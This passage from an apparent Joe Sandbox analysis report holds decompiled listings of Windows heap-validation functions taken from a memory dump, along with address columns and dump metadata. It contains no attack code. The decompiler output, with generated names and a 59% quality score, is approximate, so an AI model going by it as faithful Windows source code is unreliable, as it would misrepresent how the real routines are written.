				_t117 =  *0x11958ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E010AB150();
					} else {
						E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E010AB150("Parameter3: %p\n",  *0x11958ac);
				}
				_t119 =  *0x11958b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E010AB150();
					} else {
						E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x11958b4);
					E010AB150("Last known valid blocks: before - %p, after - %p\n",  *0x11958b0);
				} else {
					_t120 =  *0x11958b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E010AB150();
				} else {
					E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E010AB150("Stack trace available at %p\n", 0x11958c0);
			}











                                          0x01161c10
                                          0x01161c16
                                          0x01161c1e
                                          0x01161c3d
                                          0x01161c3e
                                          0x01161c20
                                          0x01161c35
                                          0x01161c3a
                                          0x01161c44
                                          0x01161c55
                                          0x01161c5a
                                          0x01161c65
                                          0x01161c67
                                          0x00000000
                                          0x01161c6e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01161c67
                                          0x01161cdc
                                          0x01161ce5
                                          0x01161d04
                                          0x01161d05
                                          0x01161ce7
                                          0x01161cfc
                                          0x01161d01
                                          0x01161d0b
                                          0x01161d17
                                          0x01161d1f
                                          0x01161d25
                                          0x01161d30
                                          0x01161d4f
                                          0x01161d50
                                          0x01161d32
                                          0x01161d47
                                          0x01161d4c
                                          0x01161d61
                                          0x01161d67
                                          0x01161d68
                                          0x01161d6e
                                          0x01161d79
                                          0x01161d98
                                          0x01161d99
                                          0x01161d7b
                                          0x01161d90
                                          0x01161d95
                                          0x01161daa
                                          0x01161db0
                                          0x01161db1
                                          0x01161db7
                                          0x01161dc2
                                          0x01161de1
                                          0x01161de2
                                          0x01161dc4
                                          0x01161dd9
                                          0x01161dde
                                          0x01161df3
                                          0x01161df9
                                          0x01161dfa
                                          0x01161e00
                                          0x01161e0a
                                          0x01161e13
                                          0x01161e32
                                          0x01161e33
                                          0x01161e15
                                          0x01161e2a
                                          0x01161e2f
                                          0x01161e39
                                          0x01161e4a
                                          0x01161e02
                                          0x01161e02
                                          0x01161e08
                                          0x00000000
                                          0x00000000
                                          0x01161e08
                                          0x01161e5b
                                          0x01161e7a
                                          0x01161e7b
                                          0x01161e5d
                                          0x01161e72
                                          0x01161e77
                                          0x01161e95

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_3_2_1080000_535276_86376.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                          • API String ID: 0-2897834094
                                          • Opcode ID: e5dd65ed982a8f507fdfdef6fc17964e3a6a7ba7d22fc44ddc0a783d4c8b2331
                                          • Instruction ID: f098917052f19fc4a13f24d91a478424287d3152a373f1c7badb6405389be124
                                          • Opcode Fuzzy Hash: e5dd65ed982a8f507fdfdef6fc17964e3a6a7ba7d22fc44ddc0a783d4c8b2331
                                          • Instruction Fuzzy Hash: E861FB33915145EFD72EEB86D494D2873A9E794930B8A803EF4896F311D7329C90DB0A
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01164AEF Relevance: 11.8, Strings: 9, Instructions: 529COMMONCrypto
                                          Download Yara Rule
                                          C-Code - Quality: 59%
                                          			E01164AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v6;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t189;
				intOrPtr _t191;
				intOrPtr _t210;
				signed int _t225;
				signed char _t231;
				intOrPtr _t232;
				unsigned int _t245;
				intOrPtr _t249;
				intOrPtr _t259;
				signed int _t281;
				signed int _t283;
				intOrPtr _t284;
				signed int _t288;
				signed int* _t294;
				signed int* _t298;
				intOrPtr* _t299;
				intOrPtr* _t300;
				signed int _t307;
				signed int _t309;
				signed short _t312;
				signed short _t315;
				signed int _t317;
				signed int _t320;
				signed int _t322;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t332;
				signed int _t340;
				signed int _t342;
				signed char _t344;
				signed int* _t345;
				void* _t346;
				signed char _t352;
				signed char _t367;
				signed int _t374;
				intOrPtr* _t378;
				signed int _t380;
				signed int _t385;
				signed char _t390;
				unsigned int _t392;
				signed char _t395;
				unsigned int _t397;
				intOrPtr* _t400;
				signed int _t402;
				signed int _t405;
				intOrPtr* _t406;
				signed int _t407;
				intOrPtr _t412;
				void* _t414;
				signed int _t415;
				signed int _t416;
				signed int _t429;

				_v16 = _v16 & 0x00000000;
				_t189 = 0;
				_v8 = _v8 & 0;
				_t332 = __edx;
				_v12 = 0;
				_t414 = __ecx;
				_t415 = __edx;
				if(__edx >=  *((intOrPtr*)(__edx + 0x28))) {
					L88:
					_t416 = _v16;
					if( *((intOrPtr*)(_t332 + 0x2c)) == _t416) {
						__eflags =  *((intOrPtr*)(_t332 + 0x30)) - _t189;
						if( *((intOrPtr*)(_t332 + 0x30)) == _t189) {
							L107:
							return 1;
						}
						_t191 =  *[fs:0x30];
						__eflags =  *(_t191 + 0xc);
						if( *(_t191 + 0xc) == 0) {
							_push("HEAP: ");
							E010AB150();
						} else {
							E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v12);
						_push( *((intOrPtr*)(_t332 + 0x30)));
						_push(_t332);
						_push("Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)\n");
						L122:
						E010AB150();
						L119:
						return 0;
					}
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E010AB150();
					} else {
						E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push(_t416);
					_push( *((intOrPtr*)(_t332 + 0x2c)));
					_push(_t332);
					_push("Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)\n");
					goto L122;
				} else {
					goto L1;
				}
				do {
					L1:
					 *_a16 = _t415;
					if( *(_t414 + 0x4c) != 0) {
						_t392 =  *(_t414 + 0x50) ^  *_t415;
						 *_t415 = _t392;
						_t352 = _t392 >> 0x00000010 ^ _t392 >> 0x00000008 ^ _t392;
						_t424 = _t392 >> 0x18 - _t352;
						if(_t392 >> 0x18 != _t352) {
							_push(_t352);
							E0115FA2B(_t332, _t414, _t415, _t414, _t415, _t424);
						}
					}
					if(_v8 != ( *(_t415 + 4) ^  *(_t414 + 0x54))) {
						_t210 =  *[fs:0x30];
						__eflags =  *(_t210 + 0xc);
						if( *(_t210 + 0xc) == 0) {
							_push("HEAP: ");
							E010AB150();
						} else {
							E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push(_v8 & 0x0000ffff);
						_t340 =  *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff;
						__eflags = _t340;
						_push(_t340);
						E010AB150("Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)\n", _t415);
						L117:
						__eflags =  *(_t414 + 0x4c);
						if( *(_t414 + 0x4c) != 0) {
							 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
							 *_t415 =  *_t415 ^  *(_t414 + 0x50);
							__eflags =  *_t415;
						}
						goto L119;
					}
					_t225 =  *_t415 & 0x0000ffff;
					_t390 =  *(_t415 + 2);
					_t342 = _t225;
					_v8 = _t342;
					_v20 = _t342;
					_v28 = _t225 << 3;
					if((_t390 & 0x00000001) == 0) {
						__eflags =  *(_t414 + 0x40) & 0x00000040;
						_t344 = (_t342 & 0xffffff00 | ( *(_t414 + 0x40) & 0x00000040) != 0x00000000) & _t390 >> 0x00000002;
						__eflags = _t344 & 0x00000001;
						if((_t344 & 0x00000001) == 0) {
							L66:
							_t345 = _a12;
							 *_a8 =  *_a8 + 1;
							 *_t345 =  *_t345 + ( *_t415 & 0x0000ffff);
							__eflags =  *_t345;
							L67:
							_t231 =  *(_t415 + 6);
							if(_t231 == 0) {
								_t346 = _t414;
							} else {
								_t346 = (_t415 & 0xffff0000) - ((_t231 & 0x000000ff) << 0x10) + 0x10000;
							}
							if(_t346 != _t332) {
								_t232 =  *[fs:0x30];
								__eflags =  *(_t232 + 0xc);
								if( *(_t232 + 0xc) == 0) {
									_push("HEAP: ");
									E010AB150();
								} else {
									E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t415 + 6) & 0x000000ff);
								_push(_t415);
								_push("Heap block at %p has incorrect segment offset (%x)\n");
								goto L95;
							} else {
								if( *((char*)(_t415 + 7)) != 3) {
									__eflags =  *(_t414 + 0x4c);
									if( *(_t414 + 0x4c) != 0) {
										 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
										 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										__eflags =  *_t415;
									}
									_t415 = _t415 + _v28;
									__eflags = _t415;
									goto L86;
								}
								_t245 =  *(_t415 + 0x1c);
								if(_t245 == 0) {
									_t395 =  *_t415 & 0x0000ffff;
									_v6 = _t395 >> 8;
									__eflags = _t415 + _t395 * 8 -  *((intOrPtr*)(_t332 + 0x28));
									if(_t415 + _t395 * 8 ==  *((intOrPtr*)(_t332 + 0x28))) {
										__eflags =  *(_t414 + 0x4c);
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^ _v6 ^ _t395;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											__eflags =  *_t415;
										}
										goto L107;
									}
									_t249 =  *[fs:0x30];
									__eflags =  *(_t249 + 0xc);
									if( *(_t249 + 0xc) == 0) {
										_push("HEAP: ");
										E010AB150();
									} else {
										E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									}
									_push( *((intOrPtr*)(_t332 + 0x28)));
									_push(_t415);
									_push("Heap block at %p is not last block in segment (%p)\n");
									L95:
									E010AB150();
									goto L117;
								}
								_v12 = _v12 + 1;
								_v16 = _v16 + (_t245 >> 0xc);
								if( *(_t414 + 0x4c) != 0) {
									 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
									 *_t415 =  *_t415 ^  *(_t414 + 0x50);
								}
								_t415 = _t415 + 0x20 +  *(_t415 + 0x1c);
								if(_t415 ==  *((intOrPtr*)(_t332 + 0x28))) {
									L82:
									_v8 = _v8 & 0x00000000;
									goto L86;
								} else {
									if( *(_t414 + 0x4c) != 0) {
										_t397 =  *(_t414 + 0x50) ^  *_t415;
										 *_t415 = _t397;
										_t367 = _t397 >> 0x00000010 ^ _t397 >> 0x00000008 ^ _t397;
										_t442 = _t397 >> 0x18 - _t367;
										if(_t397 >> 0x18 != _t367) {
											_push(_t367);
											E0115FA2B(_t332, _t414, _t415, _t414, _t415, _t442);
										}
									}
									if( *(_t414 + 0x54) !=  *(_t415 + 4)) {
										_t259 =  *[fs:0x30];
										__eflags =  *(_t259 + 0xc);
										if( *(_t259 + 0xc) == 0) {
											_push("HEAP: ");
											E010AB150();
										} else {
											E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push( *(_t415 + 4) & 0x0000ffff ^  *(_t414 + 0x54) & 0x0000ffff);
										_push(_t415);
										_push("Heap block at %p has corrupted PreviousSize (%lx)\n");
										goto L95;
									} else {
										if( *(_t414 + 0x4c) != 0) {
											 *(_t415 + 3) =  *(_t415 + 2) ^  *(_t415 + 1) ^  *_t415;
											 *_t415 =  *_t415 ^  *(_t414 + 0x50);
										}
										goto L82;
									}
								}
							}
						}
						_t281 = _v28 + 0xfffffff0;
						_v24 = _t281;
						__eflags = _t390 & 0x00000002;
						if((_t390 & 0x00000002) != 0) {
							__eflags = _t281 - 4;
							if(_t281 > 4) {
								_t281 = _t281 - 4;
								__eflags = _t281;
								_v24 = _t281;
							}
						}
						__eflags = _t390 & 0x00000008;
						if((_t390 & 0x00000008) == 0) {
							_t102 = _t415 + 0x10; // -8
							_t283 = E010FD540(_t102, _t281, 0xfeeefeee);
							_v20 = _t283;
							__eflags = _t283 - _v24;
							if(_t283 != _v24) {
								_t284 =  *[fs:0x30];
								__eflags =  *(_t284 + 0xc);
								if( *(_t284 + 0xc) == 0) {
									_push("HEAP: ");
									E010AB150();
								} else {
									E010AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_t288 = _v20 + 8 + _t415;
								__eflags = _t288;
								_push(_t288);
								_push(_t415);
								_push("Free Heap block %p modified at %p after it was freed\n");
								goto L95;
							}
							goto L66;
						} else {
							_t374 =  *(_t415 + 8);
							_t400 =  *((intOrPtr*)(_t415 + 0xc));
							_v24 = _t374;
							_v28 = _t400;
							_t294 =  *(_t374 + 4);
							__eflags =  *_t400 - _t294;
							if( *_t400 != _t294) {
								L64:
								_push(_t374);
								_push( *_t400);
								_t101 = _t415 + 8; // -16
								E0116A80D(_t414, 0xd, _t101, _t294);
								goto L86;
							}
							_t56 = _t415 + 8; // -16
							__eflags =  *_t400 - _t56;
							_t374 = _v24;
							if( *_t400 != _t56) {
								goto L64;
							}
							 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) - _v20;
							_t402 =  *(_t414 + 0xb4);
							__eflags = _t402;
							if(_t402 == 0) {
								L35:
								_t298 = _v28;
								 *_t298 = _t374;
								 *(_t374 + 4) = _t298;
								__eflags =  *(_t415 + 2) & 0x00000008;
								if(( *(_t415 + 2) & 0x00000008) == 0) {
									L39:
									_t377 =  *_t415 & 0x0000ffff;
									_t299 = _t414 + 0xc0;
									_v28 =  *_t415 & 0x0000ffff;
									 *(_t415 + 2) = 0;
									 *((char*)(_t415 + 7)) = 0;
									__eflags =  *(_t414 + 0xb4);
									if( *(_t414 + 0xb4) == 0) {
										_t378 =  *_t299;
									} else {
										_t378 = E010CE12C(_t414, _t377);
										_t299 = _t414 + 0xc0;
									}
									__eflags = _t299 - _t378;
									if(_t299 == _t378) {
										L51:
										_t300 =  *((intOrPtr*)(_t378 + 4));
										__eflags =  *_t300 - _t378;
										if( *_t300 != _t378) {
											_push(_t378);
											_push( *_t300);
											__eflags = 0;
											E0116A80D(0, 0xd, _t378, 0);
										} else {
											_t87 = _t415 + 8; // -16
											_t406 = _t87;
											 *_t406 = _t378;
											 *((intOrPtr*)(_t406 + 4)) = _t300;
											 *_t300 = _t406;
											 *((intOrPtr*)(_t378 + 4)) = _t406;
										}
										 *((intOrPtr*)(_t414 + 0x74)) =  *((intOrPtr*)(_t414 + 0x74)) + ( *_t415 & 0x0000ffff);
										_t405 =  *(_t414 + 0xb4);
										__eflags = _t405;
										if(_t405 == 0) {
											L61:
											__eflags =  *(_t414 + 0x4c);
											if(__eflags != 0) {
												 *(_t415 + 3) =  *(_t415 + 1) ^  *_t415 ^  *(_t415 + 2);
												 *_t415 =  *_t415 ^  *(_t414 + 0x50);
											}
											goto L86;
										} else {
											_t380 =  *_t415 & 0x0000ffff;
											while(1) {
												__eflags = _t380 -  *((intOrPtr*)(_t405 + 4));
												if(_t380 <  *((intOrPtr*)(_t405 + 4))) {
													break;
												}
												_t307 =  *_t405;
												__eflags = _t307;
												if(_t307 == 0) {
													_t309 =  *((intOrPtr*)(_t405 + 4)) - 1;
													L60:
													_t94 = _t415 + 8; // -16
													E010CE4A0(_t414, _t405, 1, _t94, _t309, _t380);
													goto L61;
												}
												_t405 = _t307;
											}
											_t309 = _t380;
											goto L60;
										}
									} else {
										_t407 =  *(_t414 + 0x4c);
										while(1) {
											__eflags = _t407;
											if(_t407 == 0) {
												_t312 =  *(_t378 - 8) & 0x0000ffff;
											} else {
												_t315 =  *(_t378 - 8);
												_t407 =  *(_t414 + 0x4c);
												__eflags = _t315 & _t407;
												if((_t315 & _t407) != 0) {
													_t315 = _t315 ^  *(_t414 + 0x50);
													__eflags = _t315;
												}
												_t312 = _t315 & 0x0000ffff;
											}
											__eflags = _v28 - (_t312 & 0x0000ffff);
											if(_v28 <= (_t312 & 0x0000ffff)) {
												goto L51;
											}
											_t378 =  *_t378;
											__eflags = _t414 + 0xc0 - _t378;
											if(_t414 + 0xc0 != _t378) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
								}
								_t317 = E010CA229(_t414, _t415);
								__eflags = _t317;
								if(_t317 != 0) {
									goto L39;
								}
								E010CA309(_t414, _t415,  *_t415 & 0x0000ffff, 1);
								goto L86;
							}
							_t385 =  *_t415 & 0x0000ffff;
							while(1) {
								__eflags = _t385 -  *((intOrPtr*)(_t402 + 4));
								if(_t385 <  *((intOrPtr*)(_t402 + 4))) {
									break;
								}
								_t320 =  *_t402;
								__eflags = _t320;
								if(_t320 == 0) {
									_t322 =  *((intOrPtr*)(_t402 + 4)) - 1;
									L34:
									_t63 = _t415 + 8; // -16
									E010CBC04(_t414, _t402, 1, _t63, _t322, _t385);
									_t374 = _v24;
									goto L35;
								}
								_t402 = _t320;
							}
							_t322 = _t385;
							goto L34;
						}
					}
					if(_a20 == 0) {
						L18:
						if(( *(_t415 + 2) & 0x00000004) == 0) {
							goto L67;
						}
						if(E011523E3(_t414, _t415) == 0) {
							goto L117;
						}
						goto L67;
					} else {
						if((_t390 & 0x00000002) == 0) {
							_t326 =  *(_t415 + 3) & 0x000000ff;
						} else {
							_t328 = E010A1F5B(_t415);
							_t342 = _v20;
							_t326 =  *(_t328 + 2) & 0x0000ffff;
						}
						_t429 = _t326;
						if(_t429 == 0) {
							goto L18;
						}
						if(_t429 >= 0) {
							__eflags = _t326 & 0x00000800;
							if(__eflags != 0) {
								goto L18;
							}
							__eflags = _t326 -  *((intOrPtr*)(_t414 + 0x84));
							if(__eflags >= 0) {
								goto L18;
							}
							_t412 = _a20;
							_t327 = _t326 & 0x0000ffff;
							L17:
							 *((intOrPtr*)(_t412 + _t327 * 4)) =  *((intOrPtr*)(_t412 + _t327 * 4)) + _t342;
							goto L18;
						}
						_t327 = _t326 & 0x00007fff;
						if(_t327 >= 0x81) {
							goto L18;
						}
						_t412 = _a24;
						goto L17;
					}
					L86:
				} while (_t415 <  *((intOrPtr*)(_t332 + 0x28)));
				_t189 = _v12;
				goto L88;
			}



































































                                          0x01164af7
                                          0x01164afb
                                          0x01164afd
                                          0x01164b01
                                          0x01164b03
                                          0x01164b08
                                          0x01164b0a
                                          0x01164b0f
                                          0x01164eb5
                                          0x01164eb5
                                          0x01164ebb
                                          0x011650d5
                                          0x011650d8
                                          0x01164ff6
                                          0x00000000
                                          0x01164ff6
                                          0x011650de
                                          0x011650e4
                                          0x011650e8
                                          0x01165107
                                          0x0116510c
                                          0x011650ea
                                          0x011650ff
                                          0x01165104
                                          0x01165112
                                          0x01165115
                                          0x01165118
                                          0x01165119
                                          0x011650cb
                                          0x011650cb
                                          0x011650af
                                          0x00000000
                                          0x011650af
                                          0x01164ecb
                                          0x011650b6
                                          0x011650bb
                                          0x01164ed1
                                          0x01164ee6
                                          0x01164eeb
                                          0x011650c1
                                          0x011650c2
                                          0x011650c5
                                          0x011650c6
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01164b15
                                          0x01164b15
                                          0x01164b1c
                                          0x01164b1e
                                          0x01164b23
                                          0x01164b27
                                          0x01164b33
                                          0x01164b38
                                          0x01164b3a
                                          0x01164b3c
                                          0x01164b41
                                          0x01164b41
                                          0x01164b3a
                                          0x01164b52
                                          0x01165045
                                          0x0116504b
                                          0x0116504f
                                          0x0116506e
                                          0x01165073
                                          0x01165051
                                          0x01165066
                                          0x0116506b
                                          0x01165083
                                          0x01165088
                                          0x01165088
                                          0x0116508a
                                          0x01165091
                                          0x01165099
                                          0x01165099
                                          0x0116509d
                                          0x011650a7
                                          0x011650ad
                                          0x011650ad
                                          0x011650ad
                                          0x00000000
                                          0x0116509d
                                          0x01164b58
                                          0x01164b5b
                                          0x01164b5e
                                          0x01164b63
                                          0x01164b66
                                          0x01164b69
                                          0x01164b6f
                                          0x01164be4
                                          0x01164bf0
                                          0x01164bf2
                                          0x01164bf5
                                          0x01164dc3
                                          0x01164dc6
                                          0x01164dc9
                                          0x01164dce
                                          0x01164dce
                                          0x01164dd0
                                          0x01164dd0
                                          0x01164dd5
                                          0x01164def
                                          0x01164dd7
                                          0x01164de7
                                          0x01164de7
                                          0x01164df3
                                          0x01165001
                                          0x01165007
                                          0x0116500b
                                          0x0116502a
                                          0x0116502f
                                          0x0116500d
                                          0x01165022
                                          0x01165027
                                          0x01165039
                                          0x0116503a
                                          0x0116503b
                                          0x00000000
                                          0x01164df9
                                          0x01164dfd
                                          0x01164e90
                                          0x01164e94
                                          0x01164e9e
                                          0x01164ea4
                                          0x01164ea4
                                          0x01164ea4
                                          0x01164ea6
                                          0x01164ea6
                                          0x00000000
                                          0x01164ea6
                                          0x01164e03
                                          0x01164e08
                                          0x01164f88
                                          0x01164f92
                                          0x01164f99
                                          0x01164f9c
                                          0x01164fe0
                                          0x01164fe4
                                          0x01164fee
                                          0x01164ff4
                                          0x01164ff4
                                          0x01164ff4
                                          0x00000000
                                          0x01164fe4
                                          0x01164f9e
                                          0x01164fa4
                                          0x01164fa8
                                          0x01164fc7
                                          0x01164fcc
                                          0x01164faa
                                          0x01164fbf
                                          0x01164fc4
                                          0x01164fd2
                                          0x01164fd5
                                          0x01164fd6
                                          0x01164f34
                                          0x01164f34
                                          0x00000000
                                          0x01164f39
                                          0x01164e0e
                                          0x01164e14
                                          0x01164e1b
                                          0x01164e25
                                          0x01164e2b
                                          0x01164e2b
                                          0x01164e33
                                          0x01164e38
                                          0x01164e8a
                                          0x01164e8a
                                          0x00000000
                                          0x01164e3a
                                          0x01164e3e
                                          0x01164e43
                                          0x01164e47
                                          0x01164e53
                                          0x01164e58
                                          0x01164e5a
                                          0x01164e5c
                                          0x01164e61
                                          0x01164e61
                                          0x01164e5a
                                          0x01164e6e
                                          0x01164f41
                                          0x01164f47
                                          0x01164f4b
                                          0x01164f6a
                                          0x01164f6f
                                          0x01164f4d
                                          0x01164f62
                                          0x01164f67
                                          0x01164f7f
                                          0x01164f80
                                          0x01164f81
                                          0x00000000
                                          0x01164e74
                                          0x01164e78
                                          0x01164e82
                                          0x01164e88
                                          0x01164e88
                                          0x00000000
                                          0x01164e78
                                          0x01164e6e
                                          0x01164e38
                                          0x01164df3
                                          0x01164bfe
                                          0x01164c01
                                          0x01164c04
                                          0x01164c07
                                          0x01164c09
                                          0x01164c0c
                                          0x01164c0e
                                          0x01164c0e
                                          0x01164c11
                                          0x01164c11
                                          0x01164c0c
                                          0x01164c14
                                          0x01164c17
                                          0x01164dae
                                          0x01164db2
                                          0x01164db7
                                          0x01164dba
                                          0x01164dbd
                                          0x01164ef1
                                          0x01164ef7
                                          0x01164efb
                                          0x01164f1a
                                          0x01164f1f
                                          0x01164efd
                                          0x01164f12
                                          0x01164f17
                                          0x01164f2b
                                          0x01164f2b
                                          0x01164f2d
                                          0x01164f2e
                                          0x01164f2f
                                          0x00000000
                                          0x01164f2f
                                          0x00000000
                                          0x01164c1d
                                          0x01164c1d
                                          0x01164c20
                                          0x01164c23
                                          0x01164c26
                                          0x01164c29
                                          0x01164c2c
                                          0x01164c2e
                                          0x01164d91
                                          0x01164d91
                                          0x01164d92
                                          0x01164d97
                                          0x01164d9e
                                          0x00000000
                                          0x01164d9e
                                          0x01164c34
                                          0x01164c37
                                          0x01164c39
                                          0x01164c3c
                                          0x00000000
                                          0x00000000
                                          0x01164c45
                                          0x01164c48
                                          0x01164c4e
                                          0x01164c50
                                          0x01164c78
                                          0x01164c78
                                          0x01164c7b
                                          0x01164c7d
                                          0x01164c80
                                          0x01164c84
                                          0x01164cad
                                          0x01164cad
                                          0x01164cb0
                                          0x01164cb8
                                          0x01164cbb
                                          0x01164cbe
                                          0x01164cc1
                                          0x01164cc7
                                          0x01164cdc
                                          0x01164cc9
                                          0x01164cd2
                                          0x01164cd4
                                          0x01164cd4
                                          0x01164cde
                                          0x01164ce0
                                          0x01164d13
                                          0x01164d13
                                          0x01164d16
                                          0x01164d18
                                          0x01164d29
                                          0x01164d2a
                                          0x01164d2c
                                          0x01164d34
                                          0x01164d1a
                                          0x01164d1a
                                          0x01164d1a
                                          0x01164d1d
                                          0x01164d1f
                                          0x01164d22
                                          0x01164d24
                                          0x01164d24
                                          0x01164d3c
                                          0x01164d3f
                                          0x01164d45
                                          0x01164d47
                                          0x01164d6c
                                          0x01164d6c
                                          0x01164d70
                                          0x01164d7e
                                          0x01164d84
                                          0x01164d84
                                          0x00000000
                                          0x01164d49
                                          0x01164d49
                                          0x01164d56
                                          0x01164d56
                                          0x01164d59
                                          0x00000000
                                          0x00000000
                                          0x01164d4e
                                          0x01164d50
                                          0x01164d52
                                          0x01164d8e
                                          0x01164d5d
                                          0x01164d5f
                                          0x01164d67
                                          0x00000000
                                          0x01164d67
                                          0x01164d54
                                          0x01164d54
                                          0x01164d5b
                                          0x00000000
                                          0x01164d5b
                                          0x01164ce2
                                          0x01164ce2
                                          0x01164ce5
                                          0x01164ce5
                                          0x01164ce7
                                          0x01164cfb
                                          0x01164ce9
                                          0x01164ce9
                                          0x01164cec
                                          0x01164cef
                                          0x01164cf1
                                          0x01164cf3
                                          0x01164cf3
                                          0x01164cf3
                                          0x01164cf6
                                          0x01164cf6
                                          0x01164d02
                                          0x01164d05
                                          0x00000000
                                          0x00000000
                                          0x01164d07
                                          0x01164d0f
                                          0x01164d11
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01164d11
                                          0x00000000
                                          0x01164ce5
                                          0x01164ce0
                                          0x01164c8a
                                          0x01164c8f
                                          0x01164c91
                                          0x00000000
                                          0x00000000
                                          0x01164c9d
                                          0x00000000
                                          0x01164c9d
                                          0x01164c52
                                          0x01164c5f
                                          0x01164c5f
                                          0x01164c62
                                          0x00000000
                                          0x00000000
                                          0x01164c57
                                          0x01164c59
                                          0x01164c5b
                                          0x01164caa
                                          0x01164c66
                                          0x01164c68
                                          0x01164c70
                                          0x01164c75
                                          0x00000000
                                          0x01164c75
                                          0x01164c5d
                                          0x01164c5d
                                          0x01164c64
                                          0x00000000
                                          0x01164c64
                                          0x01164c17
                                          0x01164b75
                                          0x01164bc4
                                          0x01164bc8
                                          0x00000000
                                          0x00000000
                                          0x01164bd9
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x01164b77
                                          0x01164b7a
                                          0x01164b8c
                                          0x01164b7c
                                          0x01164b7e
                                          0x01164b83
                                          0x01164b86
                                          0x01164b86
                                          0x01164b90
                                          0x01164b93
                                          0x00000000
                                          0x00000000
                                          0x01164b95
                                          0x01164bab
                                          0x01164bb0
                                          0x00000000
                                          0x00000000
                                          0x01164bb2
                                          0x01164bb9
                                          0x00000000
                                          0x00000000
                                          0x01164bbb
                                          0x01164bbe
                                          0x01164bc1
                                          0x01164bc1
                                          0x00000000
                                          0x01164bc1
                                          0x01164b97
                                          0x01164ba4
                                          0x00000000
                                          0x00000000
                                          0x01164ba6
                                          0x00000000
                                          0x01164ba6
                                          0x01164ea9
                                          0x01164ea9
                                          0x01164eb2
                                          0x00000000

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000003.00000002.454801254.0000000001080000.00000040.00001000.00020000.00000000.sdmp, Offset: 01080000, based on PE: true
                                          Joe Sandbox IDA Plugin
